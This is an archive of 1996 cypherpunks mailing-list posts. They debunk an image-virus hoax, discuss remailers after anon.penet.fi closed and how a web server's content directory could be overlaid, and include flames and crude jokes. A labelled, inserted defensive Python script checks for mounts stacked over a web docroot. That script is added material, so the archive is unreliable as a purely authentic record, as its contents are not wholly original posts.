From pstira at escape.com Sun Sep 1 00:53:28 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sun, 1 Sep 1996 15:53:28 +0800
Subject: WARNING vIRuS!
In-Reply-To: <199608311621.LAA20992@netnet1.netnet.net>
Message-ID:

On Sat, 31 Aug 1996, kickboxer wrote:

> 99.9% of
> virus scanners and other antivirus programs will not recognize it
> scan all images upon download!

duh

From alano at teleport.com Sun Sep 1 01:35:20 1996
From: alano at teleport.com (Alan Olsen)
Date: Sun, 1 Sep 1996 16:35:20 +0800
Subject: WARNING vIRuS!
Message-ID: <3.0b11.32.19960831234035.00b1f6cc@mail.teleport.com>

At 11:21 AM 8/31/96 -0500, kickboxer ignoring the "clueserver refused by host" messages wrote:

> There is a new and VERY dangerous virus called the HAZ-MAT virus!
>it fucks up the sectors on your hd, and really messes up the partition
>tables. It does this once a week, picking a random time to do it. 99.9% of
>virus scanners and other antivirus programs will not recognize it, for it is
>a totally new strain, using a never before seen code.... Be warned! The
>HAZ-MAT virus usually resides in JPG, and GIF files... once the files are
>viewed, the virus takes effect.
>scan all images upon download!

This is the clueless kind of crap I expect pitched to AOL users and upper level management.

GIF and JPEGs contain *NO* executable code. You cannot get viruses from them. You obviously have no clue as to what the hell you are talking about.

The only way that you could obtain the effects described above is with Black Magic and/or Voodoo. (And not even then.)

I remember a similar hoax going around about 3-4 years ago about viruses in image files. I guess nothing on the net is ever forgotten entirely. Especially the urban legends and bullshit.

---
| "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: |
| mankind free in one-key-steganography-privacy!"
| Ignore the man |
|`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.|
| http://www.teleport.com/~alano/ | alano at teleport.com |

From furballs at netcom.com Sun Sep 1 01:37:50 1996
From: furballs at netcom.com (Paul S. Penrod)
Date: Sun, 1 Sep 1996 16:37:50 +0800
Subject: WARNING vIRuS!
In-Reply-To:
Message-ID:

On Sat, 31 Aug 1996, Mark M. wrote:

> On Sat, 31 Aug 1996, Paul S. Penrod wrote:
>
> > Binary launches are the way they do it, and the way a virus spreads,
> > unless you get caught up with autoexecuting Word and Excel macros.
> >
> > I have yet to see *any* truly data propagating viruses.
>
> Would you count the fingerd exploit used in the Internet Worm as a data
> propagating virus? If a poorly written mail program doesn't do bounds
> checking, it could conceivably allow for a Good Times-like virus. However,
> highly unlikely, since mail programs are too diverse and it would be very
> doubtful that a brain-dead mail program would become very widespread. I would
> be much more worried about other non-email programs that fail to do bounds
> checking (like Netscape v1.1).
>
> -- Mark
>

No, I wouldn't consider the fingerd exploit a data propagated virus in the same sense as data embedded in a purely passive activity (viewing an image file) which somehow launches a vicious nasty on your disk.

However, you do bring up an interesting point in that example. Netscape and programs of that ilk, IMO, yield another exploitable pathway into a system, should someone figure a method to shove a jam into the doorway to keep the door open long enough to allow a renegade proc to be started and executed outside the control of the local operator.

...Paul

From mpd at netcom.com Sun Sep 1 02:29:10 1996
From: mpd at netcom.com (Mike Duvos)
Date: Sun, 1 Sep 1996 17:29:10 +0800
Subject: WARNING vIRuS!
In-Reply-To: <3.0b11.32.19960831234035.00b1f6cc@mail.teleport.com>
Message-ID: <199609010741.AAA25267@netcom8.netcom.com>

Alan Olsen writes:

> This is the clueless kind of crap I expect pitched to AOL users and
> upper level management.

> GIF and JPEGs contain *NO* executable code. You cannot get viruses
> from them. You obviously have no clue as to what the hell you are
> talking about.

> The only way that you could obtain the effects described above is
> with Black Magic and/or Voodoo. (And not even then.)

I don't want to restart the jpg-virus flame war again, and this particular story is likely completely bogus, but I should point out that most complicated software, including jpeg viewers, has undiscovered bugs lurking about.

It is also not particularly difficult to find a garbage input file for most sloppily written programs which bombs the program into branching into one of its data buffers. Indeed, it wasn't so long ago that you could get httpd to put crap on its own stack by feeding it an excessively long URL.

So I would certainly not be surprised if someone managed to construct a .jpg file which would do nasty things to one's machine if loaded with a specific viewer, and give an error message when loaded by other software. If the viewer was a widely used one, and the .jpg was posted on Usenet with an alluring title, one could probably do quite a bit of damage before people got wise.

Not a virus in the traditional sense, but a fairly common way to attack complicated operating systems and applications.

--
Mike Duvos $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger. $

From strix at rust.net Sun Sep 1 02:51:54 1996
From: strix at rust.net (Jennifer Mansfield-Jones)
Date: Sun, 1 Sep 1996 17:51:54 +0800
Subject: Dr. Vulis is a test, right? [was RE: Desubscribe]
In-Reply-To: <2.2.32.19960830224855.00355560@labg30>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 30 Aug 1996, John Deters wrote:

> So, my original question is: is there really a Dr.
Dmitri Vulis (KOTM)
> somewhere? Or is he just some made-up straw man, created by Tim May, John
> Gilmore and Eric Hughes for their personal amusement, and to add a spot of

There is somebody by this name in the field: the City University of New York granted a PhD to one Dimitri Vulis in 1995. The dissertation title was "Collective encryption: Cryptosystems based on the commutator collection process for certain free products".

As to whether the existence of someone with any given name has any bearing on the identity of any participant in cypherpunks, well, this list has discussed that general topic before...

regards,

`=-`=-`=-`=- -='-='-='-='
Jennifer Mansfield-Jones http://www.rust.net/~strix/strix.html
strix at rust.net PGP key ------^
Never try to outstubborn a cat. (R.A.H.)

From paul at fatmans.demon.co.uk Sun Sep 1 05:13:50 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Sun, 1 Sep 1996 20:13:50 +0800
Subject: Desubscribe
Message-ID: <841572883.28748.0@fatmans.demon.co.uk>

> Whoever uses the term "spam" in derogatory manner, opposes free
> speech and deserves to be caned.

Whoever uses the term "spam" in a non-derogatory manner is an arsehole and deserves to be shipped to Sweden where they shall be made into cheese by nuns.
Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From paul at fatmans.demon.co.uk Sun Sep 1 05:26:23 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Sun, 1 Sep 1996 20:26:23 +0800
Subject: Encryption
Message-ID: <841572886.28792.0@fatmans.demon.co.uk>

> Algorithm: Select bit-groups of random length from the file until the file is
> completely processed. Shuffle the bits in each group randomly and
> save each group back to the file. Repeat if needed using different
> key-strings for each successive encryption, for increased security.

You pay no attention whatsoever to key distribution, the fact that this is just a form of permutation and no substitution is used, also how do you account for the fact that the user`s random number source may not be strong, even recognized rng`s like the keyboard latency routines in pgp grind to a halt when faced with a hardware peculiarity like a keyboard buffer etc...
Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From farber at central.cis.upenn.edu Sun Sep 1 05:53:04 1996
From: farber at central.cis.upenn.edu (Dave Farber)
Date: Sun, 1 Sep 1996 20:53:04 +0800
Subject: Esther Dyson on Remailers
Message-ID: <3.0b11.32.19960901065251.00715d08@linc.cis.upenn.edu>

EFF does not, to my knowledge, (and I am a Board Member) have an organizational view on this issue. There are a lot of different views and each member of EFF has their own view that they can and will state as private people. The tendency of the Press to label people with organizations affiliation ship gives the impression of organizational views. For example I certainly don't speak for the University of Pennsylvania when I say things to the newspapers.

Dave

http://macpond.cis.upenn.edu

From stewarts at ix.netcom.com Sun Sep 1 06:02:53 1996
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Sun, 1 Sep 1996 21:02:53 +0800
Subject: Pseudonym server: Jenaer Anonymous Service
Message-ID: <199609011109.EAA24157@toad.com>

Jenaer Anonymous Service looks like a high-security pseudonym server. You can send outgoing mail to email or newsgroups. It accepts encrypted email addressed to anon-hexkeyid at as-node.jena.thur.de, where hexkeyid is the keyid for a PGP key you send it; it doesn't store any information about the owner of the key. To pick up your mail, you send it an encrypted message with the keyid and a Reply-To: header, and it sends you your mail by mixmaster.
It's a bit less user-friendly than some servers, since you not only need PGP, but you need to pick up your mail rather than having it arrive directly. But in return, it's pretty secure, since you can only get caught if the remailer or its operator are compromised when you request a delivery. I haven't yet checked how flexible it is about the location of Reply-To: in the headers, since some mailers make it difficult to paste that in.

The public key for the server is signed by Lutz.Donnerhacke at Jena.Thur.De, which is in turn signed by 0x3B7F286D, which MIT thinks is an unknown signator...

The help message has a policy against illegal activity, flamewars, and binary files, and says people can be blacklisted for abuse. Because you don't get your reply email until you ask to pick it up, it does seem easy to abuse; complaints, flames, and mailbombs won't reach you if you don't ask for them. I hope the operator doesn't mind the workload of managing the remailer - it looks like a good service, and with Julf's remailer shut down, we need more nymservers.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# Reassign Authority!

From erehwon at c2.net Sun Sep 1 06:22:09 1996
From: erehwon at c2.net (William Knowles)
Date: Sun, 1 Sep 1996 21:22:09 +0800
Subject: The Three Horsemen???
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

It seems most everywhere I turn, either on the Internet or on television there is some reference to the Four Horsemen of the Infocalypse, -Terrorists, Pedophiles, Drug Dealers and Money Launderers, But no real hard evidence.

But since the story broke in the Observer I have been trying to remember where I heard of Toby Tyler before, I believe it was on a television show on the Discovery Channel that Tim May was in, and recently I found this about Mr. Tyler in the Clari. newsgroups reporting on the child sex trade.
==

One professional cybercop is Toby Tyler, who surfs the Net from his computer terminal in the San Bernardino (Calif.) County Sheriff's Department. He searches for scams, sources of child porn, and deceptions designed to entrap children. Five investigators in his department are busy full-time investigating child sexual exploitation - much of it flowing from pedophiles trying to set up meetings with children by computer.

The Internet is a ``two-edged sword'' for child pornographers, Deputy Tyler says. On the one hand, he says, it seems to have damaged the profitability of pornographers who sell their wares via dial-up computer ``bulletin board.'' There is so much free stuff on the Internet - why would anyone pay?

==

Wouldn't the Observer article about anon.penet.fi transmitting 75 to 90% of the child porn on the Internet lead you to believe that since it has been shut down that all Internet child porn will pretty much dry up?

I wonder if it's now the Three Horsemen of the Infocalypse?

William Knowles
erehwon at c2.net

--
William Knowles
PGP mail welcome & preferred / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE 5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org

From dlv at bwalk.dm.com Sun Sep 1 06:31:35 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Sep 1996 21:31:35 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To:
Message-ID:

Senile tcmay at got.net (Timothy C. May) (fart) rants:

> (* I find it Orwellian that being "polite" is taken to mean not saying
> anything controversial.
It was impolite for Salman Rushdie to write "The
> Satanic Verses," it was impolite for people to mention Karla Homolka in
> talk.politics.canada, it was impolite to point out that the prime minister
> of India drinks a glass of his own urine every day, it was impolite to
> refer to Bill Clinton's dalliances with Paula Jones, and so on.

Paula Jones is a virtuous woman. Her boss, Bill Clinton, pulled down his pants and ordered her to kiss his erect penis. She refused and was fired. I think it's factually incorrect to describe this sexual harassment as "dalliances", but we already know that senile Tim May (fart) never lets any facts get in the way of his agenda.

It may be impolite to fart in senile Tim May's (fart) general direction, but we do.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Sun Sep 1 06:32:03 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Sep 1996 21:32:03 +0800
Subject: Code Review Guidelines (draft)
In-Reply-To: <199608312040.PAA20696@manifold.algebra.com>
Message-ID: <1kkkTD37w165w@bwalk.dm.com>

ichudov at algebra.com (Igor Chudov @ home) writes:

> pOL at BILA PARNQ Q,
> oKAZALSQ BEZ HUQ.
> nA HUQ MNE BEZ HUQ,
> kOGDA S HUEM DO HUQ?

dEWKI W GOSTI PRIGLA[ALI,
dA Q W GOSTI NE PO[EL -
pIDVA^I[KO NA MNE RWANYJ,
dA HUI[KO NEBOLX{OJ.

Decrypt this, Midwestern swines.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From patrickbc at juno.com Sun Sep 1 07:44:36 1996
From: patrickbc at juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 22:44:36 +0800
Subject: hackers texts
Message-ID: <19960831.074413.9510.3.patrickbc@juno.com>

If any of you hackers out there have written any texts for beginning hackers or know of any please send them to me at patrickc at juno.com

thank you
P.
cummings
Patrickbc at juno.com

From patrickbc at juno.com Sun Sep 1 07:50:23 1996
From: patrickbc at juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 22:50:23 +0800
Subject: hackerlist
Message-ID: <19960831.074413.9510.2.patrickbc@juno.com>

I am planning to make a list of hackers and would appreciate it if you would e-mail me with the following information.

handle
e-mail
city,state
url
whether or not you would like to receive the list when finished

thanks for your help
P. Cummings
Patrickbc at juno.com

From bygg at sunet.se Sun Sep 1 09:38:39 1996
From: bygg at sunet.se (Johnny Eriksson)
Date: Mon, 2 Sep 1996 00:38:39 +0800
Subject: Desubscribe
Message-ID:

> Whoever uses the term "spam" in a non-derogatory manner is an
> arsehole and deserves to be shipped to Sweden where they shall be
> made into cheese by nuns.

No thanks, we do not want them.

--Johnny

"A government that fears its citizens -- should"

From proff at suburbia.net Sun Sep 1 09:47:56 1996
From: proff at suburbia.net (Julian Assange)
Date: Mon, 2 Sep 1996 00:47:56 +0800
Subject: hackerlist
In-Reply-To: <19960831.074413.9510.2.patrickbc@juno.com>
Message-ID: <199609011450.AAA22573@suburbia.net>

> I am planning to make a list of hackers and would appreciate it if you
> would e-mail me with the following information.
> handle
> e-mail
> city,state
> url
> whether or not you would like to receive the list when finished
> thanks for your help
> P. Cummings
> Patrickbc at juno.com

Are you on this list of morons?

--
"Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S.
Lewis, _God in the Dock_
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+

From ichudov at algebra.com Sun Sep 1 10:05:27 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 01:05:27 +0800
Subject: Moscowchannel.com hack
In-Reply-To:
Message-ID: <199609011509.KAA26254@manifold.algebra.com>

snow wrote:
>
> On Sat, 31 Aug 1996, Joel McNamara wrote:
>
> > Not really crypto, but related to the DOJ hack in a way.
> >
> > Moscow Channel is a pretty slick, Russian news/commentary page. Their Web
> > site was hacked and altered by someone who didn't seem to like Russians all
> > Just a matter of time before some builds a dedicated Satan type tool that
> > scans for HTTP server holes or messed up file permissions to make locating
> > potential victims easy.
> Write your web site to a CD-ROM and hard-code the base directory into the
> webserver.

A hacker who has root can forcibly unmount the cdrom and mount another directory on that node. Not a good solution.

- Igor.

From paul at fatmans.demon.co.uk Sun Sep 1 10:23:30 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Mon, 2 Sep 1996 01:23:30 +0800
Subject: anon.penet.fi: URGENT REQUEST
Message-ID: <841590548.16439.0@fatmans.demon.co.uk>

FAO: ALL CYPHERPUNKS & COMMUNITY LIST READERS

I wish to gauge the response on something here:

Following the closure of the anon.penet.fi remailer:

If I can get enough funding to cover all expenses (I am a student and cannot unfortunately contribute much myself) I will install lines and hardware at my premises and run the equivalent to the anon.penet.fi remailer.
I don`t know what the response to this will be, I need approximately 5000 UK pounds to set up such an operation (Yes, a leased line really does cost that much in the UK) and then a monthly income of around 3000 UK pounds.

The service, I propose, would be free to the users, and maintained by voluntary donation, no access restriction would be placed on non-paying users.

Please send me mail at paul at fatmans.demon.co.uk with the subject as ANON.PENET.FI SERVER and the message body an amount in UK pounds or dollars (approximate amounts are OK) so I can gauge the response.

NO MONEY WILL BE TAKEN AT THE PRESENT TIME.

As I said, I just want to see what the response is like and to see if it would be possible, I also would be unable to set it up until I had some solid commitment from the people giving the money, I expect a large response to this and a measly one to the real appeal for hard cash if it goes ahead! - anyway, mail me and i`ll report the response back soon...

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From bdurham at metronet.com Sun Sep 1 10:34:07 1996
From: bdurham at metronet.com (Brian Durham)
Date: Mon, 2 Sep 1996 01:34:07 +0800
Subject: hackers texts
In-Reply-To: <19960831.074413.9510.3.patrickbc@juno.com>
Message-ID: <3229ADAB.7FD5@metronet.com>

Again, you may want to do a web search with Yahoo (www.yahoo.com) or hotbot (www.hotbot.com) or whatever. There is loads of good info out there and pointers to ftp sites ... you just need to do a little bit of legwork to find it all.
(Along with being creative when asked for keywords by the search engines)

Brian
bdurham at metronet.com

From angelos at gradin.cis.upenn.edu Sun Sep 1 11:02:24 1996
From: angelos at gradin.cis.upenn.edu (Angelos D. Keromytis)
Date: Mon, 2 Sep 1996 02:02:24 +0800
Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
In-Reply-To:
Message-ID: <199609011605.MAA26536@gradin.cis.upenn.edu>

-----BEGIN PGP SIGNED MESSAGE-----

In message , Alan Horowitz writes:
>
>The problem is, from my experience at Roosevelt Roads, the Navy never
>conducts live fire exercises without declaring the area of operation
>strictly off limits to non-military aircraft. Also, the 747 would have
>shown up WITH ITS TRANSPONDER DATA on the screens on an Aegis ship, so why
>would they fire? And, I didn't think that a P3 pilot would fly around in

This has happened before; an Aegis ship in the Persian Gulf shot down an Iranian Airlines (or whatever it's called) aircraft; i'm not sure how many died in that incident (i think about 70 - can very well be wrong). The US just "apologized" for the mistake AFAIK.

- -Angelos

PS. This happened 8-10 years ago if i recall well.

From jamesd at echeque.com Sun Sep 1 11:02:55 1996
From: jamesd at echeque.com (James A.
Donald)
Date: Mon, 2 Sep 1996 02:02:55 +0800
Subject: anon.penet.fi: URGENT REQUEST
Message-ID: <199609011608.JAA22545@dns1.noc.best.net>

At 03:09 PM 9/1/96 +0000, paul at fatmans.demon.co.uk wrote:
> I don`t know what the response to this will be, I need approximately
> 5000 UK pounds to set up such an operation (Yes, a leased line really
> does cost that much in the UK) and then a monthly income of around
> 3000 UK pounds.

A little greedy. Other people have set up a multitude of remailers for substantially less.

We now need remailers, preferably many, many small remailers rather than one big remailer, that is as easy to reply to as alt.penet.fi, but which gives substantially better security, that is to say the reply address can map to a remailer chain, instead of being constrained to map to a regular address as the penet.fi remailer did.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From jya at pipeline.com Sun Sep 1 11:07:17 1996
From: jya at pipeline.com (John Young)
Date: Mon, 2 Sep 1996 02:07:17 +0800
Subject: Beta Scam
Message-ID: <199609011609.QAA18242@pipe6.t2.usa.pipeline.com>

http://www.economist.com/issue/31-08-96/wb1.html

Beware Geeks bearing gifts

The Internet is well known as a pioneer when it comes to technology. Less noticed is its role on the cutting edge of management fashion. Nowadays, it is fashionable for firms to "outsource" product development to just about everybody. Leading Internet firms have developed this method a stage further: they have found an outside supplier so keen to tender his services that he is sometimes willing to pay for the privilege. The name of this fool? The consumer.

[More on beta-scamming at the URL.]
From jamesd at echeque.com Sun Sep 1 11:12:03 1996
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 2 Sep 1996 02:12:03 +0800
Subject: Desubscribe
Message-ID: <199609011607.JAA22532@dns1.noc.best.net>

> > deserves to be shipped to sweden where they shall be
> > made into cheese by nuns.

At 04:40 PM 9/1/96 DST, Johnny Eriksson wrote:
>
> No thanks, we do not want them.

You are Swedish?

I heard on talk.politics.guns somebody say that in Sweden they had banned knives with a sharp point at the end, and were going to ban sharp knives altogether.

I think he was just engaging in hyperbole, that he really meant that gun control in Sweden was unreasonably strict, but on reflection I am not sure.

What is the story?

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From ichudov at algebra.com Sun Sep 1 11:29:52 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 02:29:52 +0800
Subject: Bob Dole on Drugs
Message-ID: <199609011633.LAA30982@manifold.algebra.com>

http://allpolitics.com/news/9608/31/radio.addresses/

... snip ...

Dole, who returned to Washington for Labor Day weekend, also pledged to use the White House as a bully pulpit to promote the "moral message" against drugs and to criticize what he called the entertainment industry's glamorization of drug use.

On Sunday, he is to address the convention of the National Guard Association of the United States during which he's expected to propose that the military be enlisted to assist in a renewed war on drugs.
From agt387465 at blackhel.fbi.gov Sun Sep 1 11:39:15 1996
From: agt387465 at blackhel.fbi.gov (David Pfeiffer 387465)
Date: Mon, 2 Sep 1996 02:39:15 +0800
Subject: Hacker list information
Message-ID:

Patrick:

I am interested in a copy of your mailing list.

Thank you.

David Pfeiffer

From bdavis at thepoint.net Sun Sep 1 11:50:24 1996
From: bdavis at thepoint.net (Brian Davis)
Date: Mon, 2 Sep 1996 02:50:24 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To:
Message-ID:

On Sat, 31 Aug 1996, Timothy C. May wrote:

> To be blunt, if Singapore wants to stop me from discussing the dictator Yew
> and his feeble son, they can't. Except by pulling the plugs on forums in
> which my posts are carried. I consider this a Good Thing (that politicians
> in Country A generally have no power to tell citizen-units in Country B
> what they can say and what they can't).

Unless they adopt "Assassination Protection [of the "ignorant" masses]!! And they won't use remailers ...

EBD

>
> --Tim May
>
>
> --
> [This Bible excerpt awaiting review under the U.S. Communications Decency
> Act of 1996]
> And then Lot said, "I have some mighty fine young virgin daughters. Why
> don't you boys just come on in and fuck them right here in my house - I'll
> just watch!"....Later, up in the mountains, the younger daughter said:
> "Dad's getting old. I say we should fuck him before he's too old to fuck."
> So the two daughters got him drunk and screwed him all that night. Sure
> enough, Dad got them pregnant, and had an incestuous bastard son....Onan
> really hated the idea of doing his brother's wife and getting her pregnant
> while his brother got all the credit, so he pulled out before he
> came....Remember, it's not a good idea to have sex with your sister, your
> brother, your parents, your pet dog, or the farm animals, unless of course
> God tells you to.
[excerpts from the Old Testament, Modern Vernacular
> Translation, TCM, 1996]
>
>
>

From jk at stallion.ee Sun Sep 1 11:56:04 1996
From: jk at stallion.ee (Jüri Kaljundi)
Date: Mon, 2 Sep 1996 02:56:04 +0800
Subject: anon.penet.fi: URGENT REQUEST
In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk>
Message-ID:

Sun, 1 Sep 1996 paul at fatmans.demon.co.uk wrote:

> I don`t know what the response to this will be, I need approximately
> 5000 UK pounds to set up such an operation (Yes, a leased line really
> does cost that much in the UK) and then a monthly income of around
> 3000 UK pounds.

I remember the load on anon.penet.fi was something like 7500 messages daily. As for connection, you will need 64kbps line or even less in case you compress the messages. The machine could be either an older Sun Sparc or a PC running free Unix (Linux/FreeBSD/...)

Here in Estonia 64kbps costs between 400-600 USD per month, machine would be something like 1000-2000 USD.

Still I believe someone setting up a remailer should do so for free, from their own or company resources. The best way would be every ISP to set up their own remailers and nym servers.

Jüri Kaljundi
AS Stallion
jk at stallion.ee

From ichudov at algebra.com Sun Sep 1 12:12:07 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 03:12:07 +0800
Subject: Moscowchannel.com hack
In-Reply-To: <199609011723.NAA00697@nrk.com>
Message-ID: <199609011722.MAA31289@manifold.algebra.com>

David Lesher wrote:
>
> Igor Chudov @ home sez:
> >
> > > Write your web site to a CD-ROM and hard-code the base directory into the
> > > webserver.
> >
> > A hacker who has root can forcibly unmount the cdrom and mount another
> > directory on that node. Not a good solution.
>
> Real hard disks such as RL02's & RK07's have WRITE DISABLE
> switches....
>

You can't mount the whole Unix read-only, so there will always be a place to put the hacked web page, and then mount that place over DocumentRoot.

- Igor.
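
[Added example, not part of any list message: a defender-side check for the situation discussed in this thread, where the site lives on read-only media but something else has been mounted over DocumentRoot. It parses Linux /proc/self/mountinfo text; the docroot /var/www, the device /dev/sr0 and the sample mount table are assumptions constructed for illustration.]

```python
import re

# Constructed sample in /proc/self/mountinfo format (not taken from a real host).
# Mount 41 is the read-only CD-ROM holding the site; mount 57 is a bind mount of
# a writable directory stacked on the same mount point, hiding the CD-ROM.
SAMPLE_TAMPERED = """\
21 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
41 21 11:0 / /var/www ro,relatime shared:2 - iso9660 /dev/sr0 ro
57 41 8:1 /tmp/.site /var/www rw,relatime shared:1 - ext4 /dev/sda1 rw
"""
SAMPLE_CLEAN = "".join(SAMPLE_TAMPERED.splitlines(keepends=True)[:2])


def _unescape(field):
    # mountinfo writes space, tab, newline and backslash as \ooo octal escapes.
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text):
    """Return one dict per mount from mountinfo-formatted text."""
    mounts = []
    for line in text.splitlines():
        left, sep, right = line.partition(" - ")
        head, tail = left.split(), right.split()
        if not sep or len(head) < 6 or len(tail) < 2:
            continue  # blank or malformed line
        mounts.append({
            "id": int(head[0]),
            "parent": int(head[1]),
            "root": _unescape(head[3]),        # path inside the filesystem
            "mount_point": _unescape(head[4]),
            "options": set(head[5].split(",")),
            "fstype": tail[0],
            "source": _unescape(tail[1]),
        })
    return mounts


def effective_mount(mounts, path):
    """Return the mount that actually serves `path` (topmost of the deepest)."""
    path = path.rstrip("/") or "/"
    covering = [m for m in mounts
                if m["mount_point"] == "/"
                or path == m["mount_point"]
                or path.startswith(m["mount_point"] + "/")]
    if not covering:
        return None
    depth = max(len(m["mount_point"]) for m in covering)
    stack = [m for m in covering if len(m["mount_point"]) == depth]
    # A mount stacked on another at the same path has the lower one as parent,
    # so the visible mount is the one that is nobody's parent in the stack.
    parents = {m["parent"] for m in stack}
    top = [m for m in stack if m["id"] not in parents]
    return (top or stack)[-1]


def check_docroot(text, docroot, expect_source, expect_fstype):
    """Return a list of findings; an empty list means the docroot is as expected."""
    mounts = parse_mountinfo(text)
    top = effective_mount(mounts, docroot)
    if top is None:
        return ["no mount covers " + docroot]
    findings = []
    stacked = [m for m in mounts if m["mount_point"] == top["mount_point"]]
    if len(stacked) > 1:
        findings.append("%d mounts stacked on %s" % (len(stacked), top["mount_point"]))
    if (top["source"], top["fstype"]) != (expect_source, expect_fstype):
        findings.append("served from %s (%s), expected %s (%s)"
                        % (top["source"], top["fstype"], expect_source, expect_fstype))
    if top["root"] != "/":
        findings.append("bind mount of subdirectory " + top["root"])
    if "ro" not in top["options"]:
        findings.append("mounted read-write")
    return findings


if __name__ == "__main__":
    for name, text in (("clean", SAMPLE_CLEAN), ("tampered", SAMPLE_TAMPERED)):
        print(name, check_docroot(text, "/var/www", "/dev/sr0", "iso9660"))
```

[On a live Linux host the text argument would be the contents of /proc/self/mountinfo. An intruder with root can also alter a check that runs on the same machine, so comparing the served pages against known-good hashes from a separate host is the stronger control.]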
From wb8foz at nrk.com Sun Sep 1 12:16:50 1996
From: wb8foz at nrk.com (David Lesher)
Date: Mon, 2 Sep 1996 03:16:50 +0800
Subject: Moscowchannel.com hack
In-Reply-To: <199609011509.KAA26254@manifold.algebra.com>
Message-ID: <199609011723.NAA00697@nrk.com>

Igor Chudov @ home sez:
>
> > Write your web site to a CD-ROM and hard-code the base directory into the
> > webserver.
>
> A hacker who has root can forcibly unmount the cdrom and mount another
> directory on that node. Not a good solution.

Real hard disks such as RL02's & RK07's have WRITE DISABLE switches....

--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From ichudov at algebra.com Sun Sep 1 12:22:56 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 03:22:56 +0800
Subject: It is good that anon.penet.fi has been closed!
Message-ID: <199609011733.MAA31382@manifold.algebra.com>

Yes, subject says it all.

anon.penet.fi was a whole lot worse than cypherpunks remailers. It provided clueless users with no real security, because it stored return addresses and did not use chaining and encryption.

Maybe closing of anon.penet.fi will spur real interest from the unwashed alt.sex.* masses to the truly secure remailers.

- Igor.

From frissell at panix.com Sun Sep 1 12:43:47 1996
From: frissell at panix.com (Duncan Frissell)
Date: Mon, 2 Sep 1996 03:43:47 +0800
Subject: Esther Dyson on Remailers
Message-ID: <2.2.32.19960901173906.00730cd8@panix.com>

At 06:52 AM 9/1/96 -0400, Dave Farber wrote:
>EFF does not, to my knowledge, (and I am a Board Member) have an
>organizational view on this issue. There are a lot of different views and
>each member of EFF has their own view that they can and will state as
>private people.
